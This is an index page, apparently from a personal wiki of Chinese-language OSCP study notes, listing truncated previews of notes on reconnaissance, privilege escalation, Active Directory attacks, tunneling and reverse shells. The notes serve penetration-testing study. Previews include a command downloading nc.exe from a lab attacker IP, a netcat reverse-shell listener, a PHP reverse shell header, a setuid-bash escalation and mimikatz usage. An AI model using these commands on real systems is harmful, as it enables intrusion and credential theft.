【Treeman】OSCP
【OSCP】課程筆記
OSCP 筆記
起手式 scan ip port service 列舉 版本 : CVE 設定 狀態 initial access interactive shell P...
Google haking
這個 Google 搜尋用法是用來尋找網頁伺服器上可能包含檔案目錄索引的特定檔案或資料夾的索引頁面。該搜尋字符串的組成部分如下: intitle:"index of": 這部分指示 G...
【Tunnel】Port forwarding and Tunneling
Port forwarding socat : 課本18.2 範例 rinetd:它更適合長期的端口轉發配置,但對於臨時端口轉發解決方案來說可能稍微不夠靈活。 Netcat + 命名管道文...
【Tip】關於 bash
【Tip】無痕模式 bash script -c /bin/bash -q /dev/null 這個指令使用了 `script` 工具,該工具通常用於記錄終端會話。下面是詳細解釋: ...
【kali】未安裝工具
rockyou(seclists) /usr/share/seclists # 安裝 sudo apt update sudo apt install -y seclists cd...
OSCP Recipe 2023
OSCP Recipe 2023 Date: 20230921 ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking...
常用目錄/檔案
除了 rwx 文件權限外,還有兩個與可執行文件相關的額外特殊權利:setuid 和 setgid。這些用字母 "s" 來表示。 如果這兩個權限被設置,權限中將出現大寫或小寫的 "s"。這允許當...
【php】php攻擊手法
php 漏洞網頁 index.php <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a...
【反向 shell】
https://gchq.github.io/CyberChef https://www.online-python.com/ Online - Reverse Shell Generato...
【Linux】【列舉】常用命令
# 尋找當前用戶可寫目錄 oe@debian-privesc:~$ find / -writable -type d 2>/dev/null .. /home/joe /home/joe...
【Windows】【列舉】常用命令
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net u...
【kali】解析度設定
【kali】解析度設定 【1400 X 900】 【VirtualBox】【檢視】-> 【全螢幕模式】 【VirtualBox】【虛擬畫面1】-> 【縮放至200%】
【Windows】【提權】Get-ObjectAcl 搜尋自己可管理帳號
Get-NetUser 找到自己 sid # 方法一 PS C:\Tools> Get-NetUser -Identity stephanie logoncount ...
【Windows】登入方法
密碼 取得方法: 密碼噴灑 crackmapexe hash破解 # impacket-GetUserSPNs => Kerberoasting攻擊 取得hash # hashc...
【轉載】Emotet病毒惡意文件分析實例
https://www.uuu.com.tw/Public/content/article/21/20210308.htm 主要是想寫 cyberchef 組合用法,有空再整理
【Mac】未安裝軟體
mac install for ctfhttps://medium.com/@seitzmanuel/how-to-get-your-mac-osx-ready-for-playing-ctfs...
【Linux】【提權】相關指令
Sudo install # # ./bash -p => -p: 載入下環境變數 sudo install -m 755 $(which bash) . ./bash -p
包包的解題思路
既使走過的路,每當事情有了變化,都要重新檢視,說不定當初不可利用的服務,在某階段,可以再次利用 flag的截圖指令要正確喔 hostname && whoami && cat proof.t...
exam
【總覽】Tools
常用網站 提權 g0tmi1k(Linux 提權) gtgobins (提權查詢) echo 'exec "/bin/bash"' > app.rb 編碼 CyberCh...
【OSCP】Tools
【Data】SecLists
SecLists(安全列表)是一個包含多種類型的列表的集合,用於安全評估。這些列表包括用戶名、密碼、URL、敏感數據的grep字符串、fuzzing載荷等等。 其目標是使安全測試人員能夠將這個...
【Terminal】telnet
Telnet(Telecommunication Network)是一個網路協議和一個命令行工具,用於建立基於文本的遠程連接到遠程伺服器、設備或主機,以便進行遠程管理、測試和診斷。 #teln...
【Terminal】powercat
就是NetCat 的Powershell 版本 https://github.com/besimorhino/powercat 下載: https://github.com/besimor...
【Terminal】rlwrap
# 安裝 sudo apt install rlwrap # listener 8888 rlwrap -cAr nc -nvlp8888 `rlwrap` 是一個用於包裹 Rea...
【web】【windows】【PowerShell】 iwr
`iwr` 是 Windows PowerShell 中的一個 cmdlet,用於發送 HTTP、HTTPS 或 FTP 請求,並檢索相應的響應。`iwr` 的全稱是 "Invoke-WebRe...
【Shell】powershell
啟動powershell # -ep bypass 繞過執行策略 PS C:\Users\stephanie> powershell -ep bypass Windows PowerS...
【shell】find
# 找尋可寫的資料夾 find / -writable -type d 2>/dev/null # 尋找當前用戶可寫目錄 oe@debian-privesc:~$ find / -writ...
【online】【編碼】jscompress.com
https://jscompress.com/ var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/use...
【online】【編碼】CyberChef
https://gchq.github.io/CyberChef
【PortScan】netcat
基本上,一個主機向目的地埠口的伺服器發送TCP SYN數據包。如果目的地埠口是開放的,伺服器將以SYN-ACK數據包回應,並且客戶端主機將發送ACK數據包以完成握手。如果握手成功完成,該埠口被認...
【PortScan】nmap
常用語法 ## nmap 預設會scan ip (主機探測) 與 port (服務探測) ## 列出網段內機器的ip (主機探測) # -sn (no service scan) 不掃...
【PortScan】rustscan
Rustscan (只做udp 掃描) RustScan 是一個用於快速、輕量級端口掃描的開源工具,使用 Rust 編程語言開發。它的目標是提供快速且高效的端口掃描,同時提供友好的用戶界面和一...
【GitHub】Gitrob 和 Gitleaks
Gitrob: Gitrob 是一個用於 GitHub 存儲庫的敏感信息搜索工具。它主要用於尋找在 GitHub 上公開的 Git 存儲庫中可能包含敏感信息的情況,例如金鑰、密碼、AP...
【DNS】Host
host 存在與否,有不同的回應 # host {domain} kali@kali:~$ host www.megacorpone.com www.megacorpone.com has...
【DNS】dnsrecon
dnsrecon 是一個用於執行域名系統(DNS)渗透测试和信息收集的工具。它提供了各種功能,用於識別目標域名的 DNS 記錄、發現子域名、枚舉主機名和 IP 地址等。以下是 dnsrecon ...
【DNS】DNSEnum
DNSEnum是另一個流行的DNS列舉工具,可以用來進一步自動化對megacorpone.com域的DNS列舉。我們可以傳遞一些選項給工具,但為了這個示例,我們只會傳遞目標域參數: kali@...
【DNS】whois
whois : service tcp/43
【DNS】nslookup
C:\Users\student>nslookup mail.megacorptwo.com DNS request timed out. timeout was 2 seco...
【SMB】nbtscan
我們可以使用它來查詢NetBIOS名稱服務的有效NetBIOS名稱,並使用-r選項指定UDP端口137作為源端口。 kali@kali:~$ sudo nbtscan -r 192.168.5...
【SMB】WsgiDAV
們將首先在 Kali 系統上設置一個 WebDAV 共享。我們將使用 WsgiDAV2 作為 WebDAV 伺服器來主持和提供我們的文件。我們可以使用 pip3 來安裝 WsgiDAV。 ka...
【SMB】net view
它列出了屬於特定主機的域、資源和計算機。舉個例子,連接到client01虛擬機,我們可以列出運行在dc01上的所有共享。 C:\Users\student>net view \\dc01 /a...
【SMB】enum4linux
$ enum4linux -a -o 192.168.202.13 =========================================( Target Info...
【SMB】smbclient
# //192.168.203.13/files => share folder # -c command smbclient -N //192.168.203.13/files -...
【SMB】【Remote】 CME ( CrackMapExec )
CrackMapExec(簡稱CME)是一個用於自動化測試和渗透測試的開源工具,旨在簡化與Windows環境中的Active Directory(AD)進行交互的過程。它是一個功能強大的渗透測試...
【SNMP】onesixtyone
OneSixtyOne(也稱為onesixty1或161)是一個用於 SNMP(Simple Network Management Protocol,簡單網路管理協議)掃描的命令行工具。SNMP...
【SNMP】snmpwalk
我們可以使用像snmpwalk這樣的工具來探測並查詢SNMP值,前提是我們知道SNMP的只讀社區字符串,而在大多數情況下它是“public”。 1.3.6.1.2.1.25.1.6...
【Romote】xfreerdp rdesktop
xfreerdp /cert-ignore /size:93% /v:192.168.198.151 /u:student /p:lab xfreerdp /cert-ignore /siz...
【PathBuster】Gobuster
支援不同的列舉模式,包括fuzzing和dns,但目前,我們只會依賴dir模式,該模式列舉文件和目錄。我們需要使用-u參數指定目標IP,並使用-w參數指定單詞列表。默認運行的線程數是10;我們...
【linux】【提權】【弱掃】linpeas
# install sudo apt-get update sudo apt-get -y install peass # 複製到本地 kali@kali:~$ cp /usr/sh...
【Linux】【提權】GTFOBins
GTFOBins 是一個安全工具,用於收集和提供攻擊者在 Linux 和 Unix 系統上濫用的 "提升權限" 或 "逃逸" 技術。它的全名是 "GTFO (Get The Fudge Out)...
【AD】【列舉】ADRecon
ADRecon(Active Directory Reconnaissance)是一種用於對Active Directory(AD)環境進行信息收集和分析的工具或技術。Active Direct...
【AD】【列舉】BooldHound
BoooldHound(BloodHound)是一個用於Active Directory(AD)環境的安全分析和攻擊模擬工具。它旨在幫助安全專業人員、紅隊人員和藍隊人員更好地理解和評估AD環境中...
【Exploit】SearchSploit
SearchSploit 是一個命令行搜索工具,用於在本地系統上搜索 Exploit Database 存檔。這個存檔預設包含在 Kali Linux 中的 exploitdb 包中。我們建議在...
【Honeypot】canarytokens
https://canarytokens.org/generate 我們將使用Canarytokens,這是一個免費的網絡服務,生成帶有嵌入式令牌的鏈接,我們將其發送給目標。當目標在瀏覽器中打...
【AD】【列舉】PowerView.ps1
下載: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 教學: https:/...
【AD】【列舉】PsLoggedOn
讓我們嘗試對之前嘗試列舉的計算機運行PsLoggedOn,首先是FILES04和WEB04。 PsLoggedOn位於CLIENT75的C:\Tools\PSTools目錄中。要使用它,我們只需...
【AD】【列舉】Get-Acl
我們將使用PowerShell的Get-Acl cmdlet。這個命令本質上將檢索我們使用 -Path 標誌定義的對象的權限並將它們打印在我們的PowerShell提示中。 PS C:\Too...
【AD】net
# 使用者加入 group # net group {group name} {username} /add /domain PS C:\Tools> net group "Manag...
【AD】【解碼】gpp-decrypt
我們找到一個名為 old-policy-backup.xml 的文件: 由於文件夾的命名和文件本身的名稱,看起來這是一個較舊的域策略文件。這是域共享上的一個常見遺物,因為系統管理員在實施新...
【AD】【列舉】SharpHound
https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1 SharpHound 有幾種不同的格式可用。我們可以自...
【列舉】wpscan
WPScan 是一款用於檢測 WordPress 網站安全性的開源工具。以下是一些常見的指令用法的繁體中文說明。請注意,WPScan 的命令行參數和選項可能會因版本而略有變化,建議在使用時查閱最...
【SQL Injection】sqlmap
kali@kali:~$ sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user # 傾卸整個數據庫,包括用戶憑據 -...
【file】【列舉】
ExifTool 是一個用於讀取、編輯和寫入影像、音頻和視頻文件的元數據(metadata)的命令行工具。它由Phil Harvey開發,支援多種檔案格式,包括JPEG、TIFF、PNG、PDF...
【Linux】【列舉】linpeas
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS `linpeas.sh` 是一個用於 Linux 系統的自動化信息搜集工...
【web】【列舉】whatweb
# 安裝 sudo apt-get install whatweb # whatweb {domain} ┌──(kali㉿kali)-[~] └─$ whatweb www....
【web】【爆破】burpsuite
#啟動 kali@kali:~$ burpsuite https://bookstack.treemanou.com/books/treemanoscp/page/ch8-introduct...
【web】【爆破】gobuster
# 安裝 sudo apt-get update sudo apt-get install gobuster # git hub # https://github.com/OJ...
【terminal】php-reverse-shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php <?php // p...
【web】【linux】【shell】curl
curl #`--path-as-is` 是在使用 cURL 命令時的一個特殊參數, # 它指示 cURL 將 URL 中的路徑部分視為原樣處理,而不進行百分比編碼(Percent-E...
【sql】impacket-mssqlclient
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
【SQL_injection】github
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Inje...
【密碼】【破解】hashcat
https://hashcat.net/hashcat/ hashCode 範例 https://hashcat.net/wiki/doku.php?id=example_hashes # ...
【terminal】【impacket】psexec
要執行 psexec,我們可以輸入 impacket-psexec 並帶有兩個參數。第一個參數是 -hashes,它允許我們使用 NTLM 雜湊來對目標進行身份驗證。格式為 "LMHash:NT...
【SMB】【Net-NTLMv2雜湊監聽】Responder
現在讓我們進行這個過程。首先,我們需要運行ip a以檢索所有接口的列表。然後,我們將以sudo運行Responder(在Kali上已經預安裝),以啟用處理各種協議的特權原始套接字操作所需的...
【shell】【impacket】ntlmrelayx
# --no-http-server來停用HTTP伺服器,因為我們正在中繼SMB連接 # -smb2support添加對SMB2.3的支援。 # -t將目標設定為FILES02。 #...
【列舉】【提權】【Linux】unix-privesc-check
/usr/bin/unix-privesc-check kali@kali:~$ unix-privesc-check unix-privesc-check v1.4 ( http://pe...
【密碼】【字典】crunch
字典生成 # 最小和最大長度設置為 6 個字符 # 使用 -t 參數指定模式,然後將前三個字符硬編碼為 "Lab",後跟三位數字。 kali@kali:~$ crunch 6 6 -t L...
【破解】【SSH】Hydra
# hydra -l {user} -P {password字典} {ip} -t 4 ssh -V kali@kali:~$ hydra -l eve -P wordlist 192...
【列舉】【shell】getcap
https://feichashao.com/capabilities_basic/ # 尋找設置uid檔案 joe@debian-privesc:~$ /usr/sbin/getcap -...
【port forwarding】socat
們將啟動一個詳細模式的(-ddd) Socat 進程。它將在 TCP 埠 2345 上監聽(TCP-LISTEN:2345),在收到連接時分叉為一個新的子進程(fork),而不是在單個連接後死亡...
【port forwarding】rinetd
https://github.com/samhocevar/rinetd rinetd 是一個簡單的 TCP 端口轉發工具,它可以將進入的 TCP 連接重定向到指定的目標 IP 地址和端口。以...
【port forwarding】proxychains
kali@kali:~$ tail /etc/proxychains4.conf 配置了Proxychains後,現在我們可以使用我們Kali機器上的smbclient列出HRSHARES...
【port forwarding】sshuttle
然而,它需要在SSH客戶端上具有root權限並在SSH伺服器上使用Python3,因此它並非始終是最輕量級的選擇。 # kali -> vm1 (192.168.50.63 | 10.4.50...
【滲透】Metasploit
產生payload 提權 getsystem 修改進程ID ps migrate {pid} getgiid 其他模組 hashdump: 轉儲 SAM 數據庫的內容 ...
【powershell】PowerView
PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-NetDomain PS C:\Tools> Get-NetUser ...
【powershell】PsLoggedOn
PsLoggedOn將列舉HKEY_USERS下的注冊表密鑰,以檢索已登錄用戶的安全標識符(SID)並將SID轉換為用戶名。 PsLoggedOn還將使用NetSessionEnum API查看...
【powershell】Sharphound
PS C:\Tools> Import-Module .\Sharphound.ps1 PS C:\Tools> Get-Help Invoke-BloodHound PS C:\T...
【雜湊】【AD】mimikatz
PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege:...
【powershell】【密碼噴灑】Spray-Passwords.ps1
PS C:\Users\jeff> cd C:\Tools PS C:\Tools> powershell -ep bypass ... PS C:\Tools> .\Spray-...
【密碼噴灑】kerbrute
我們可以獲取並緩存Kerberos TGT。我們需要提供用戶名和密碼。如果憑證有效,我們將獲取一個TGT。這種技術的優勢在於,它僅使用兩個UDP帧來確定密碼是否有效,因為它僅發送AS-REQ並檢...
【shell】【impacket】【AS-REP Roasting】GetNPUsers
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast cor...
【AS-REP Roasting】Rubeus
# /nowrap,以防止將新行添加到生成的AS-REP哈希 PS C:\Users\jeff> cd C:\Tools PS C:\Tools> .\Rubeus.exe asrepr...
【powershell】【自訂】ldap search
function1.ps1 function LDAPSearch { param ( [string]$LDAPQuery ) $PDC ...
【powershell】【橫移】PsExec
# 使用帳密連線至另一主機 .\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd
【Tunneling】Chisel
# kali下載 wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd...
【Tunneling】dnscat2
原生 dnscat2 https://teamssix.com/210608-150224.html https://github.com/iagox86/dnscat2 kali ...
【Windows】【弱掃】Seatbelt
Seatbelt 是一個 C# 項目,從進攻性和防禦性安全角度執行許多面向安全的主機調查「安全檢查」。 # 下載 wget https://github.com/r3motecontrol/...
【PortScan】Masscan
Masscan是網路大規模的連接埠掃描儀。它可以在5分鐘內掃描整個互聯網,每秒從一台機器上傳輸1000萬個資料包(和掃描者的頻寬有關,掃描速率高容易誤報) https://github.com...
名詞解釋
Exploit
Exploit "Exploit" 是指一種利用軟件、硬體或協議中的漏洞或弱點,以實現攻擊者目標的程式碼或技術。Exploit 的目的是利用系統或應用程式中的漏洞,使攻擊者能夠繞過正常的安全措...
CVE
CVE(Common Vulnerabilities and Exposures)是一個用於標識和跟蹤計算機安全漏洞的字母縮寫。CVE的目的是提供一個標準的標識系統,以便組織和個人能夠共享和檢索...
Service Principal Names (SPNs)
Service Principal Names (SPNs) 是 Microsoft Active Directory 中用於識別特定服務實體(通常是應用程式或服務)的唯一名稱。SPNs是用來建...
APT (Advanced Persistent Threat)
APT(高级持久性威胁,Advanced Persistent Threat)是指一種高度專業化、有組織結構且持續性的攻擊,通常由國家級的駭客組織、間諜機構或犯罪團體發起。APT攻擊的目標通常是...
OSCP Exam Guide
https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide 截圖規範: log ip user 考...
常用連結
google haking databasehttps://dorksearch.com/ 發現運行在特定網站上的技術,以及查找與相同IP網段共享的其他主機。https://searchdns...
【Mac】未安裝工具
brew install openssl brew install rustscan brew install burp-suite brew install owasp-zap ...